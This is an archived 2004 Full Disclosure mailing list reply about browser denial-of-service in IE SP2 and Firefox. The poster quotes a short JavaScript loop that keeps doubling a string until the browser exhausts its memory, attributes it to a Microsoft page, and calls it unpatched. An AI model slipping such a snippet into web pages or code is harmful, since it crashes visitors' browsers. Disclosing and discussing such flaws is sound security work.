Full Disclosure mailing list archives

Re: IE sp2 and Mozilla Firefox DoS.

From: "morning_wood" <se_cur_ity () hotmail com>
Date: Tue, 28 Dec 2004 12:38:03 -0800

even Microsoft publishes PoC for browser DoS ( multi platform too )
see:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp

------ / snip / ------
var big_string = "double me up!";
while (true)
{
    big_string = big_string + big_string;   // 20 iterations equals all your
memory...
}
----- / snip / --------

kinda funny... unpatched too!
cheers,
m.w
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: IE sp2 and Mozilla Firefox DoS. morning_wood (Jan 05)
- <Possible follow-ups>
- Re: IE sp2 and Mozilla Firefox DoS. phased (Jan 06)
- Re: IE sp2 and Mozilla Firefox DoS. Sebastian Dietz (Jan 06)
- RE: IE sp2 and Mozilla Firefox DoS. bipin gautam (Jan 06)